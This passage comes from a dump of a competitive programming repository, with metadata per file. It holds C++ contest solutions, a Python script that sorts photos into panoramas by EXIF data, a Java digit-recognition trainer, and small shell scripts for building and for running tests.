freopen(problem\".in\", \"r\", stdin);\r\n    freopen(problem\".out\", \"w\", stdout);\r\n \r\n    int n, root;\r\n    cin >> n;\r\n    vector<vector<int>> g(n);\r\n \r\n    vector<int> color(n);\r\n    vector<int> ans(n, 0);\r\n \r\n    for (int v = 0; v < n; v++)\r\n    {\r\n        int u, c;\r\n        cin >> u >> c;\r\n        color[v] = c;\r\n        if (u == 0)\r\n        {\r\n            root = v;\r\n        }\r\n        else\r\n        {\r\n            g[u - 1].push_back(v);\r\n        }\r\n    }\r\n \r\n    vector<int> q(n);\r\n \r\n    int head = 0, tail = 0;\r\n \r\n    q[tail++] = root;\r\n \r\n    while (head != tail)\r\n    {\r\n        int u = q[head++];\r\n \r\n        int m = g[u].size();\r\n \r\n        for (int i = 0; i < m; i++)\r\n        {\r\n            q[tail++] = g[u][i];\r\n        }\r\n    }\r\n \r\n    vector<set<int>*> s(n, NULL);\r\n    for (int i = n - 1; i >=0; i--)\r\n    {\r\n        int u = q[i];\r\n \r\n        int m = g[u].size();\r\n \r\n        for (int j = 0; j < m; j++)\r\n        {\r\n            int v = g[u][j];\r\n \r\n            if (s[u] == NULL || s[u]->size() < s[v]->size())\r\n            {\r\n                s[u] = s[v];\r\n            }\r\n        }\r\n \r\n        for (int j = 0; j < m; j++)\r\n        {\r\n            int v = g[u][j];\r\n \r\n            if (s[u] != s[v])\r\n            {\r\n                for(set<int>::iterator itr = s[v]->begin(); itr != s[v]->end(); ++itr)\r\n                {\r\n                    s[u]->insert(*itr);\r\n                }\r\n            }\r\n        }\r\n \r\n        if (s[u] == NULL)\r\n        {\r\n            s[u] = new set<int>();\r\n        }\r\n \r\n        s[u]->insert(color[u]);\r\n        ans[u] = s[u]->size();\r\n    }\r\n \r\n    for (int i = 0; i < n; i++)\r\n    {\r\n        cout << ans[i] << ' ';\r\n    }\r\n \r\n \r\n    return 0;\r\n}" }, { "alpha_fraction": 0.5078824162483215, "alphanum_fraction": 0.5272688269615173, "avg_line_length": 29.679738998413086, "blob_id": "efb4f339a67ec9bab608996077364c6699b02886", "content_id": "465cdc4e2dc2a4849657bf802a3ef09c9faea611", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4694, "license_type": "no_license", "max_line_length": 163, "num_lines": 153, "path": "/CodeForce/0995/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FILENAME \"input\"\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\ntypedef vector<long long> vll;\ntypedef pair<int, int> pii;\ntypedef valarray<int> va;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define whole(a) a.begin(), a.end()\n#define next next__\n#define prev prev__\n#define count count__\n\n#define ints(a...) int a; readln(a)\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... Args> inline\n#define ttti template<class T> inline\n \nconst int MOD = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\nconst ll LLMAX = numeric_limits<ll>::max();\n \nvoid writeln(){cout<<\"\\n\";}ttti void print(T a);ttti void priws(T a);ttti void read(T& a);\nttta void readln(Args&... args){(read(args),...);}tthti void writeln(H h,T...t){priws(h);(print(t),...);writeln();}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\nvector<string>split(string&s,string d){vector<string> v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\nttta void err(string v,Args...args){auto vv=split(v,\", \");auto it=vv.begin();(writeln(*it++,\"=\",args),...);}\n\n\n//binpow\nll binpow(ll a, ll n, ll p)\n{\n ll res = 1;\n while (n > 0)\n {\n if (n & 1)\n res = (res * a) % p;\n a = (a * a) % p;\n n >>= 1;\n }\n return res;\n}\n//Igorjan\n//}}}\n///-------------------------------------------------------------------------------------------------------------------------------------\n\nvoid run()\n{\n ints(u, v, p);\n map<int, pii> p1, p2;\n queue<int> q1, q2;\n int found = -1;\n q1.push(u);\n q2.push(v);\n\n auto contains = [&](map<int, pii>& m, int value) { return m.find(value) != m.end(); };\n\n auto push1 = [&](int next, pii prev) {\n if (contains(p1, next))\n return;\n p1[next] = prev;\n q1.push(next);\n };\n\n auto push2 = [&](int next, pii prev) {\n if (contains(p2, next))\n return;\n p2[next] = prev;\n q2.push(next);\n if (contains(p1, next))\n found = next;\n };\n\n auto next = [&](int x) { return (x + 1) % p; };\n auto prev = [&](int x) { return (x + p - 1) % p; };\n auto inverse = [&](int x) { return binpow(x, p - 2, p); };\n\n while (found == -1)\n {\n int x = q1.front();\n int y = q2.front();\n q1.pop();\n q2.pop();\n\n push1(next(x), {x, 1});\n push1(prev(x), {x, 2});\n push1(inverse(x), {x, 3});\n\n push2(next(y), {y, 2});\n push2(prev(y), {y, 1});\n push2(inverse(y), {y, 3});\n }\n\n vi ans;\n int x = found;\n int y = found;\n while (x != u)\n ans.pb(p1[x].second),\n x = p1[x].first;\n reverse(whole(ans));\n while (y != v)\n ans.pb(p2[y].second),\n y = p2[y].first;\n writeln(ans.size());\n writeln(ans);\n return;\n}\n\n//{{{\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n#ifndef ONLINE_JUDGE\n writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti ostream&operator<<(ostream&os,valarray<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti istream&operator>>(istream&is,valarray<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.5399558544158936, "alphanum_fraction": 0.5567328929901123, "avg_line_length": 28.225807189941406, "blob_id": "2fa728baca19529bcf2c2ffcbffdce7254c4ef56", "content_id": "41b587521090c47d01200a241a2c76f05f28e4cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4530, "license_type": "no_license", "max_line_length": 165, "num_lines": 155, "path": "/CodeForce/0618/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 19 March 2015 (deleted unused defines & reorganization from 05 November 2015)\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define forit(it, r) for (auto it = r.begin(); it != r.end(); ++it)\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn1(i, n) for (int i = 1; i < (int) (n); ++i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\n#define ll long long\n#define pb push_back\n#define vi vector<int>\n#define pii pair<ll, ll>\n#define vll vector<long long>\n#define pll pair<long long, long long>\n#define whole(a) a.begin(), a.end()\n#define next next__\n#define prev prev__\n#define count count__\n#define argmax(a) (max_element(whole(a)) - (a).begin())\n#define argmin(a) (min_element(whole(a)) - (a).begin())\n\n#define ints(a...) int a; readln(a)\n#define lls(a...) ll a; readln(a)\n#define wr(args...) err(split(#args,',').begin(),args)\n \n#define FILENAME \"input\"\n#define INF 1000000007\n \n#define tthti template<typename Head, typename... Tail> inline\n#define ttt12i template<typename T1, typename T2> inline\n#define ttti template<typename T> inline\n\ninline void writeln2(){cout<<\"\\n\";}\ninline void writeln() {cout<<\"\\n\";}\ninline void readln() {}\nttti void read(T&);\nttti void priws(T);\nttti void print(T);\n\nvoid err(vector<string>::iterator it){++it;}\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntthti void writeln (Head head, Tail... tail){priws(head);writeln2(tail...);}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\nvector<string>split(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.pb(x);return move(v);}\n\n///-------------------------------------------------------------------------------------------------------------------------------------\n//Igorjan\n\nll sqr(ll x)\n{\n return x * x;\n}\n\nll dist(pll& a, pii& b)\n{\n return sqr(a.first - b.first) + sqr(a.second - b.second);\n}\n\n/*\n ax ay 1\n bx by 1\n cx cy 1\n*/\n\n#define ax a.first\n#define bx b.first\n#define cx c.first\n#define ay a.second\n#define by b.second\n#define cy c.second\nint ori(pii& a, pii& b, pii& c)\n{\n ll q = ax * 1ll * by - ay * 1ll * bx - ax * 1ll * cy + ay * 1ll * cx + bx * 1ll * cy - by * 1ll * cx;\n return q > 0 ? 1 : q < 0 ? -1 : 0;\n}\n\nvoid run()\n{\n#define piii pair<pair<ll, ll>, int>\n ints(n);\n vector<piii> a(n);\n fori(n)\n readln(a[i].first),\n a[i].second = i + 1;\n int index = argmin(a);\n auto z = a[index];\n a.erase(a.begin() + index);\n sort(whole(a), [&z](piii& a, piii& b) {\n int q = ori(z.first, a.first, b.first);\n if (q == 0)\n return dist(z.first, a.first) < dist(z.first, b.first);\n return q == 1;\n });\n int i = 1;\n while (ori(z.first, a[0].first, a[i].first) == 0)\n ++i;\n writeln(z.second, a[0].second, a[i].second);\n}\n\nint main()\n{\n#ifndef ONLINE_JUDGE\n double time = clock();\n#endif\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n#ifndef ONLINE_JUDGE\n writeln(\"execution time =\", (clock() - time) / CLOCKS_PER_SEC);\n#endif\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){if(a.size()==0){int n;is>>n;a.resize(n);}for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;}\n" }, { "alpha_fraction": 0.5686988234519958, "alphanum_fraction": 0.5750682353973389, "avg_line_length": 33.34375, "blob_id": "e0cee879bf652b82560b5f4e099badfca25f0419", "content_id": "01e34f177cb07eff3688dfa2f552825cb67b5a56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2198, "license_type": "no_license", "max_line_length": 184, "num_lines": 64, "path": "/scripts/splitByPanoramas.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nimport PIL.Image\nimport PIL.ExifTags\n\nimport sys\nsys.path.append('/home/igorjan/206round/scripts')\n\nfrom library import *\n\ndef getDate(x):\n return datetime.datetime.strptime(x, '%Y:%m:%d %H:%M:%S')\n\[email protected]()\[email protected]('directory', required=True, type=click.Path(file_okay=False), nargs=1)\ndef findPanos(directory):\n def getExif(filename):\n try:\n img = PIL.Image.open(os.path.join(directory, filename))\n return dotdict({\n PIL.ExifTags.TAGS[k]: v\n for k, v in img._getexif().items()\n if k in PIL.ExifTags.TAGS\n }, filename = filename)\n except IOError:\n print(filename, 'is not an image')\n return None\n\n panos = []\n cur = []\n exifs = list(filter(lambda x: x, map(lambda filename: getExif(filename), os.listdir(directory))))\n exifs.sort(key = lambda x: getDate(x.DateTime))\n\n def isPortrait(exif):\n return exif.ExifImageWidth < exif.ExifImageHeight or exif.Orientation is not None and exif.Orientation % 2 == 0\n\n for exif in exifs:\n if cur:\n last = cur[-1]\n diff = (getDate(exif.DateTime) - getDate(last.DateTime)).total_seconds()\n # print(last.ExifImageWidth, last.ExifImageHeight, last.Model, last.Orientation)\n if isPortrait(exif) and diff < 60 and diff > 0 and last.Model == exif.Model and last.ExifImageWidth == exif.ExifImageWidth and last.ExifImageHeight == exif.ExifImageHeight:\n cur.append(exif)\n else:\n if len(cur) > 1:\n panos.append(cur)\n if isPortrait(exif):\n cur = [exif]\n else:\n cur = []\n elif isPortrait(exif):\n cur = [exif]\n if len(cur) > 1:\n panos.append(cur)\n for (i, pano) in enumerate(panos):\n # print(i, pano)\n dst = os.path.join(directory, str(i + 1))\n os.mkdir(dst)\n for exif in pano:\n filename = exif.filename\n os.rename(os.path.join(directory, filename), os.path.join(dst, filename))\n\nif __name__ == \"__main__\":\n completion()\n" }, { "alpha_fraction": 0.4944852888584137, "alphanum_fraction": 0.5173319578170776, "avg_line_length": 31.547008514404297, "blob_id": "65eab1d99bc79dcc37f32185b8cbf21612ce212a", "content_id": "5f17c4460ef33f25ea003bb055cf5ffc967c5a14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3808, "license_type": "no_license", "max_line_length": 174, "num_lines": 117, "path": "/2020/bguirQual/F.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 100000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nmap<ll, vector<vector<ll>>> cache;\nvoid run()\n{\n ll n;\n readln(n);\n\n vector<ll> degs = {1};\n fori(19)\n degs.pb(degs.back() * 10);\n function<vector<vector<ll>>(ll)> get = [&](const ll& x) {\n if (auto it = cache.find(x); it != cache.end())\n return it->second;\n vector<vector<ll>> ans(10);\n if (x < 100)\n {\n if (x < 10)\n ans[x].pb(x);\n else\n {\n auto temp = abs(x % 10 - x / 10);\n if (!temp) return ans;\n ans[temp].pb(temp);\n ans[temp].pb(x);\n }\n return cache[x] = ans;\n }\n set<ll> values;\n int y = to_string(x).size();\n FOR(i, max(1, y / 2 - 3), min(y, y / 2 + 3))\n {\n ll left = x % degs[i];\n ll right = x / degs[i];\n ll t = abs(left - right);\n if (t)\n values.insert(t);\n }\n for (const ll& t: values)\n {\n auto temp = get(t);\n fori(10) if (ans[i].empty() && !temp[i].empty()) \n {\n ans[i] = temp[i];\n ans[i].push_back(x);\n break;\n }\n }\n return cache[x] = ans;\n };\n\n if (n < 100 && n % 11 == 0)\n return writeln(1, n);\n auto answer = get(n);\n fori(10)\n if (!answer[i].empty())\n {\n reverse(all(answer[i]));\n return writeln(SZ(answer[i]), answer[i]);\n }\n\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n double time = clock();\n ints(t); fori(t) run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * (clock() - time) / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.39726027846336365, "alphanum_fraction": 0.4212328791618347, "avg_line_length": 23.851064682006836, "blob_id": "4e2160b914ff1ef415b47035fa27c0219032fdd8", "content_id": "2ee897b1a6927fd13178b629a8410a618fc277b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1168, "license_type": "no_license", "max_line_length": 67, "num_lines": 47, "path": "/2019/GCJ/D.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\nimport random\n\ndef randString(n):\n s = ['0'] * (n // 2) + ['1'] * ((n + 1) // 2)\n for i in range(n - 1, 0, -1):\n j = random.randint(0, i)\n s[i], s[j] = s[j], s[i]\n return s\n # return [chr(random.randint(48, 49)) for i in range(n)]\n\ndef main():\n n, b, f = map(int, input().split())\n # sys.stderr.write(str(n) + \" \" + str(b) + \" \" + str(f) + \"\\n\")\n s = [randString(n) for i in range(f)]\n t = [''] * f\n for i in range(f):\n print(''.join(s[i]))\n # sys.stderr.write(''.join(s[i]) + '\\n')\n sys.stdout.flush()\n t[i] = input()\n\n ans = []\n i = 0\n for j in range(n - b):\n while True:\n ok = True\n for k in range(f):\n ok = ok and (s[k][i] == t[k][j])\n i += 1\n if ok:\n break\n ans += [i - 1]\n while i < n:\n i += 1\n ans += [i - 1]\n\n print(' '.join(map(str, ans)))\n # sys.stderr.write(' '.join(map(str, ans)) + '\\n')\n sys.stdout.flush()\n # s = input()\n if input() == \"-1\":\n sys.stderr.write(\"WA\\n\")\n\nrandom.seed(100000007)\nfor t in range(int(input())):\n main()\n" }, { "alpha_fraction": 0.5500778555870056, "alphanum_fraction": 0.587441623210907, "avg_line_length": 25.52857208251953, "blob_id": "1acdf4c89b7461153bda599ec413831a05f94fee", "content_id": "9bbaae404a60ca747b86fbd99994be33a672d429", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1927, "license_type": "no_license", "max_line_length": 95, "num_lines": 70, "path": "/study/task7/Train.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "package task7;\r\n\r\nimport java.io.File;\r\nimport java.io.IOException;\r\nimport java.util.List;\r\n\r\npublic class Train {\r\n\r\n\tstatic final String path = \"ann\" + File.separator;\r\n\r\n\tstatic void writeln(Object o) {\r\n\t\tSystem.out.println(o);\r\n\t}\r\n\r\n\tpublic static void main(String[] args) throws IOException {\r\n\t\tint n = IOUtils.imageLength;\r\n\r\n\t\tint count = 60000;\r\n\t\tList<Digit> train = IOUtils.readDigitSet(path + \"train\");\r\n\t\tList<Digit> test = IOUtils.readDigitSet(path + \"test\");\r\n\t\ttrain = train.subList(0, count);\r\n\t\tArtificialNeuralNetwork networks[] = new ArtificialNeuralNetwork[n - 2];\r\n\t\tint[][][] cm = new int[n][10][10];\r\n\t\tint begin = 12;\r\n\t\tint index = begin;\r\n\t\tdouble mx = 0;\r\n\t\tdouble cur = System.currentTimeMillis();\r\n\t\twriteln(\"begin\");\r\n\t\tfor (int hidden = begin; hidden < begin + 1; ++hidden) {\r\n\t\t\tnetworks[hidden] = new ArtificialNeuralNetwork(n * n, n * 10, 10);\r\n\r\n\t\t\tint counter = 0;\r\n\t\t\tfor (Digit digit : train) {\r\n\t\t\t\tif (++counter % 2000 == 0)\r\n\t\t\t\t{\r\n\t\t\t\t\twriteln(counter);\r\n\t\t\t\t\t//ArtificialNeuralNetwork.writeln(digit.getSignal());\r\n\t\t\t\t\tLayer.e /= 1.3;///e polls.addVote?owner_id=-29253653&poll_id=161027588&answer_id=525733035\r\n\t\t\t\t}\r\n\t\t\t\tnetworks[hidden].add(digit);\r\n\t\t\t}\r\n\r\n\t\t\tfor (Digit digit : test) {\r\n\t\t\t\t++cm[hidden][digit.label][networks[hidden].getArgMax(digit)];\r\n\t\t\t}\r\n\t\t\tdouble percent = 0;\r\n\t\t\tdouble sum = 0;\r\n\t\t\tfor (int i = 0; i < 10; i++) {\r\n\t\t\t\tfor (int j = 0; j < 10; j++)\r\n\t\t\t\t\tsum += cm[hidden][i][j];\r\n\t\t\t\tpercent += cm[hidden][i][i];\r\n\t\t\t}\r\n\t\t\tpercent /= sum;\r\n\t\t\tif (percent > mx) {\r\n\t\t\t\tmx = percent;\r\n\t\t\t\tindex = hidden;\r\n\t\t\t}\r\n\t\t\twriteln(\"percent = \" + (percent * 100) + \"%\");\r\n\t\t}\r\n\t\twriteln(index);\r\n\t\tfor (int i = 0; i < 10; i++) {\r\n\t\t\tfor (int j = 0; j < 10; j++) {\r\n\t\t\t\tSystem.out.printf(\"%4d \", cm[index][i][j]);\r\n\t\t\t}\r\n\t\t\tSystem.out.println();\r\n\t\t}\r\n\t\twriteln(System.currentTimeMillis() - cur);\r\n\t\tIOUtils.writeAnn(networks[index], path + \"output.ann\");\r\n\t}\r\n}\r\n" }, { "alpha_fraction": 0.36693549156188965, "alphanum_fraction": 0.39717742800712585, "avg_line_length": 16.714284896850586, "blob_id": "17a4be5b70171f79f5cdc0eecaeda011a8c9bb59", "content_id": "7b1c030fa8722b45ca3ebc037ceccd3aebc575ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 496, "license_type": "no_license", "max_line_length": 42, "num_lines": 28, "path": "/scripts/runSolution.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "exe=$1\nchecker=$2\ndir=$3\n\nif [ ! \"$dir\" ]; then\n dir=\".\"\nfi\n\nfor i in $(seq 1 1000)\ndo\n cur=$dir/$i\n if [ ! -f \"$cur\" ]; then \n if [ ! -f \"$dir/0$i\" ]; then \n if [ ! -f \"$dir/00$i\" ]; then \n break;\n fi\n cur=\"$dir/00$i\"\n else\n cur=\"$dir/0$i\"\n fi\n fi\n echo \"Test $cur\"\n $exe < $cur > $cur.out\n $checker $cur $cur.out $cur.a\n ec=$?\n rm -rf $cur.out\n #if [ $ec -eq 1 ]; then break; fi\ndone\n" }, { "alpha_fraction": 0.4602150619029999, "alphanum_fraction": 0.5483871102333069, "avg_line_length": 17.600000381469727, "blob_id": "f72e86dfd2ff7a01fc3be4dfb4f9e7784eb7dfb1", "content_id": "75b90e3834a555157293e419a420b18cf32c7f89", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 465, "license_type": "no_license", "max_line_length": 95, "num_lines": 25, "path": "/CodeForce/1576/generator.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import random\nimport math\nimport sys\n\nn = 1400\nm = 15000\nc = 0\nf = 14000\ng = 4500\n\ndef genUV(n):\n u = random.randint(0, n - 1)\n while True:\n v = random.randint(0, n - 1)\n if u != v:\n return u, v\n\nprint(n, m, c, f)\nfor i in range(m):\n u, v = genUV(n)\n print(i, random.randint(0, g), u, v, random.randint(100, 1000), random.randint(1, 10 ** 5))\n\nfor i in range(f):\n u, v = genUV(n)\n print(i, u, v, random.randint(2, 12000))\n" }, { "alpha_fraction": 0.5415162444114685, "alphanum_fraction": 0.5631768703460693, "avg_line_length": 18.714284896850586, "blob_id": "23a6624f46ab5a1a1c6bd146b641b69120cf61e2", "content_id": "fe0892731046a276d8c42668390bc2ea1efd3304", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 277, "license_type": "no_license", "max_line_length": 70, "num_lines": 14, "path": "/scripts/buildHere.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n\nmkdir -p out\ncd out\n\nif ls ../*.pro 1> /dev/null 2>&1; then\n qmake .. && make;\nelse\n if ls ../CMakeLists.txt 1> /dev/null 2>&1; then\n cmake .. && make;\n else\n echo \"No .pro and CMakeLists.txt is found, nothing to do here\"\n fi\nfi\n\n" }, { "alpha_fraction": 0.46754562854766846, "alphanum_fraction": 0.476673424243927, "avg_line_length": 13.92424201965332, "blob_id": "394844e07acbe03a293d893f6e949415652111fc", "content_id": "3ab642b628cdc9f259ca6e44d8ade023e6f9f586", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 986, "license_type": "no_license", "max_line_length": 39, "num_lines": 66, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.10.15/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "\n//compiler: MSVC 2010 (C++ obviously)\n//one template to rule them all\n\n#include <iostream>\n#include <fstream>\n#include <map>\n#include <vector>\n#include <set>\n#include <deque>\n#include <algorithm>\n\ntypedef unsigned long long ull;\ntypedef long long ll;\n\n#define FN \"test\"\n\nusing namespace std;\n\nclass why\n{\npublic:\n bool operator()(int a, int b)\n {\n return a > b;\n }\n};\n\nint main()\n{\n#ifdef LOCALZ\n ifstream in(FN \".in\");\n ofstream out(FN \".out\");\n#else\n istream &in = cin;\n ostream &out = cout;\n#endif\n int n;\n in >> n;\n\n vector<int> v;\n v.reserve(n);\n\n for(int i = 0; i < n; i++)\n {\n int a;\n in >> a;\n v.push_back(a);\n }\n\n sort(v.begin(),v.end(), why());\n\n int m = 0;\n\n for(int i = 0; i < n; i++)\n {\n if(v[i]+i > m)\n m = v[i]+i;\n }\n\n out << m + 2;\n\n#ifdef LOCALZ\n out.close();\n#endif\n return 0;\n}\n" }, { "alpha_fraction": 0.42798253893852234, "alphanum_fraction": 0.4704170823097229, "avg_line_length": 30.968992233276367, "blob_id": "e85216e1d2eea6f7b9157cf27daf2747fc4ec999", "content_id": "ee0e6447c422089cfc84f0eccb8e4a38a9db370a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4124, "license_type": "no_license", "max_line_length": 928, "num_lines": 129, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.10.19/J.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <math.h>\n#include <algorithm>\n#include <queue>\n\n#define enter printf(\"\\n\");\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define vi vector<int>\n#define con 100000\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"jenny\";\nstring FILEINPUT = FILENAME;\nint mx = 0;\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void 